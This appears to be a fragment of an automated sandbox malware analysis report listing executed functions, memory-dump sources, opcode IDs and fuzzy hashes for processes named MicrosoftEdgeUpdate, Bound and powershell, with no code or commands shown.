                                                                                                                    • Instruction ID: c42aca84ba8d4a7e405e68d4a5f0c322c0ceedda9d915d3f62c4966e5b2b5738
                                                                                                                    • Opcode Fuzzy Hash: 74e12ff6cd443e5464f8266149c76665e9b95e7d7b52d69c788ea22be157ed90
                                                                                                                    • Instruction Fuzzy Hash: 34419C30908A4D8FDB68DF98C885BEDBBF1FB99310F10426AD009E7256DB74A985CF40
                                                                                                                    Function 00007FFD9BAD11D1 Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f1827ce0670b973e8d708f0c82d94cf5eb42deedb7cb611df3e9e9a59f08018
                                                                                                                    • Instruction ID: cbb33cc53d0de8819540757de606f62795d42d4cd903579592beb56e07c04840
                                                                                                                    • Opcode Fuzzy Hash: 6f1827ce0670b973e8d708f0c82d94cf5eb42deedb7cb611df3e9e9a59f08018
                                                                                                                    • Instruction Fuzzy Hash: A2410D12F0F5D60BE726A7EC68715F86B50EFA2365B0903B7C49CCA1E7CC5A29418392
                                                                                                                    Function 00007FFD9BAD0C9D Relevance: .1, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a2fbd27e1b8b897d10c4dd87e2d9aa1becb25ba17bc7ea2037fbad0bf57d656
                                                                                                                    • Instruction ID: ef99afb27b523b28cfeaacd8b74875a67073868b511744cb4faa3f32bc2f7950
                                                                                                                    • Opcode Fuzzy Hash: 3a2fbd27e1b8b897d10c4dd87e2d9aa1becb25ba17bc7ea2037fbad0bf57d656
                                                                                                                    • Instruction Fuzzy Hash: 69412730E0964D8FDBA5EFA8C4A4AFDBBB1FF59300F10016AD059E7291CB75A941CB54
                                                                                                                    Function 00007FFD9BAD0E0D Relevance: .1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6c292c9fc7d337754c450c82ca89864dba74f23bceb87db3788408427a83b36f
                                                                                                                    • Instruction ID: fc7d83efb75776e2d44c3b5eed9bef88d4a87adecf8fed41da2a59133e7b6492
                                                                                                                    • Opcode Fuzzy Hash: 6c292c9fc7d337754c450c82ca89864dba74f23bceb87db3788408427a83b36f
                                                                                                                    • Instruction Fuzzy Hash: A321E431A4964D4FDB60DB68D8216EDBBB0FF99310F05017AD008E3292CE795941CB51
                                                                                                                    Function 00007FFD9BAD12BB Relevance: .1, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71ede54b7d47635a6068802795dcd70d75f98f7cf55c93e4609cf8b804095577
                                                                                                                    • Instruction ID: 860be972dd0ea05a61ac33fb9052d8c4a5dceff3f1fd6d4f0f48d5998465dbb8
                                                                                                                    • Opcode Fuzzy Hash: 71ede54b7d47635a6068802795dcd70d75f98f7cf55c93e4609cf8b804095577
                                                                                                                    • Instruction Fuzzy Hash: 78110812A0F6C50FE325937D5C612A46E91EF96310F1902BBD1CCC72EBD89AAC418396

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAD0AAD Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Od$6Od
                                                                                                                    • API String ID: 0-2552814580
                                                                                                                    • Opcode ID: 863136419b61ae1d247731b5c9b100b3ecf8aa944e951566380ab65c1e3fc735
                                                                                                                    • Instruction ID: 5a052b71afbf79330b687c20263457bfeb31464e3bbeda5c2fdf8e48c936a38a
                                                                                                                    • Opcode Fuzzy Hash: 863136419b61ae1d247731b5c9b100b3ecf8aa944e951566380ab65c1e3fc735
                                                                                                                    • Instruction Fuzzy Hash: 5A715030E0961D8FDB94EF68D8A4BECBBB1FF59304F550179D009E72A6CA75A981CB01
                                                                                                                    Function 00007FFD9BAD0488 Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Od$6Od
                                                                                                                    • API String ID: 0-2552814580
                                                                                                                    • Opcode ID: 6dedb8f936fb0889d432e43681d98a045a7e0146833817094911afbde29e8865
                                                                                                                    • Instruction ID: ed629ce15a673713ee063430dec25e46f9dcdb283c0486c3913d02dd9a7decbc
                                                                                                                    • Opcode Fuzzy Hash: 6dedb8f936fb0889d432e43681d98a045a7e0146833817094911afbde29e8865
                                                                                                                    • Instruction Fuzzy Hash: E3713D30E0961D8FDB94EF68D8A4BECBBB1FF59304F550179D009E72A6CA75A981CB01
                                                                                                                    Function 00007FFD9BAD0D1D Relevance: 2.8, Strings: 2, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Od$6Od
                                                                                                                    • API String ID: 0-2552814580
                                                                                                                    • Opcode ID: cffcb5be07b7df019270830a219fa5e8095c45a9c754b901f273fec08febc8b4
                                                                                                                    • Instruction ID: 5dbb844cf22c0b5ee098d0bf6318b9295fa420dc2e20bbe2ebb037efa7f26f2c
                                                                                                                    • Opcode Fuzzy Hash: cffcb5be07b7df019270830a219fa5e8095c45a9c754b901f273fec08febc8b4
                                                                                                                    • Instruction Fuzzy Hash: 43813174A0994D8FDF95EF6CC8A5AACBBF1FF5A300F1501A5D04DDB2A6CA74A841CB01
                                                                                                                    Function 00007FFD9BAD0490 Relevance: 1.9, Strings: 1, Instructions: 684COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P;]
                                                                                                                    • API String ID: 0-3130340819
                                                                                                                    • Opcode ID: 8799f19a6a001c687037023aadb962491d7ee3dfd5bf6bd91842df23d0b4fa9f
                                                                                                                    • Instruction ID: a927b9b155897a976532ea43137ca90b95b89552a5b717e285b71f4f21e93ae1
                                                                                                                    • Opcode Fuzzy Hash: 8799f19a6a001c687037023aadb962491d7ee3dfd5bf6bd91842df23d0b4fa9f
                                                                                                                    • Instruction Fuzzy Hash: C6C10C61E0E6894FE765D7B88875AA8BFB0FF56324F0902FAD458CB1D3DD24A841C345
                                                                                                                    Function 00007FFD9BAD048D Relevance: 1.3, Strings: 1, Instructions: 2COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P;]
                                                                                                                    • API String ID: 0-3130340819
                                                                                                                    • Opcode ID: 8aac64cb718b5695fc5417cc6ef3e0a6347d9bbf7c6c46a3fa4092ac2bbd7f7e
                                                                                                                    • Instruction ID: f0a130a5b7d8450b6b9902f4bd8027a2b7f4d2ab71df9887679a18c57f0769cc
                                                                                                                    • Opcode Fuzzy Hash: 8aac64cb718b5695fc5417cc6ef3e0a6347d9bbf7c6c46a3fa4092ac2bbd7f7e
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Function 00007FFD9BAD05E0 Relevance: .6, Instructions: 558COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2c1d750e0a848ab7f9dd740d6934277894f653b0ef4c013f2e2af6a4894519a7
                                                                                                                    • Instruction ID: ceac0223c6e1a008e82efa96115977bb9d7956a3717665e2872ca7956ba6e637
                                                                                                                    • Opcode Fuzzy Hash: 2c1d750e0a848ab7f9dd740d6934277894f653b0ef4c013f2e2af6a4894519a7
                                                                                                                    • Instruction Fuzzy Hash: 60717730A0954D8FEB55DB68D861FA8BBB1EF9E318F4806F9E048DB2D7CD24A841C711
                                                                                                                    Function 00007FFD9BAD0F52 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fc3e35d564a615864dba33c122f7c74892d538ef64591308b5e6380ee27e7989
                                                                                                                    • Instruction ID: 254e342e2624a90e3efbed5cbc1c0064380734a88d5bfea11ef7f66f6673b5f8
                                                                                                                    • Opcode Fuzzy Hash: fc3e35d564a615864dba33c122f7c74892d538ef64591308b5e6380ee27e7989
                                                                                                                    • Instruction Fuzzy Hash: C2E06F3190AA4C5BCB20AB699C202D936A2FBCE308F00022DE44CD3180E33A5688C30A

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAC33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000014.00000002.2041766920.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_20_2_7ffd9bac0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                    • Instruction ID: ee59faf03481a4826278b3042e26341a3348b81f49576dea66fea955f9f1e53b
                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                    • Instruction Fuzzy Hash: 5801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10066DE58AC76A5DA36E882CB45

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAB33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2122475166.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_7ffd9bab0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                    • Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                    • Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAA33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2229545818.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5ee6a48b50bec202467d4e2bb54c60ca84e7c308efdb1dd157925d32c71b31ce
                                                                                                                    • Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
                                                                                                                    • Opcode Fuzzy Hash: 5ee6a48b50bec202467d4e2bb54c60ca84e7c308efdb1dd157925d32c71b31ce
                                                                                                                    • Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BA933A5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000021.00000002.2342785655.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_33_2_7ffd9ba90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0c97eb58c76ab628996e3617ddc048fdde98264560ca4b81bbdf52808bed74b2
                                                                                                                    • Instruction ID: 627da323b74165e897b80f8164bf9b00e1793352cd0bfc28d8964fc9c2b98573
                                                                                                                    • Opcode Fuzzy Hash: 0c97eb58c76ab628996e3617ddc048fdde98264560ca4b81bbdf52808bed74b2
                                                                                                                    • Instruction Fuzzy Hash: 1201843020CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1DA22E881CB45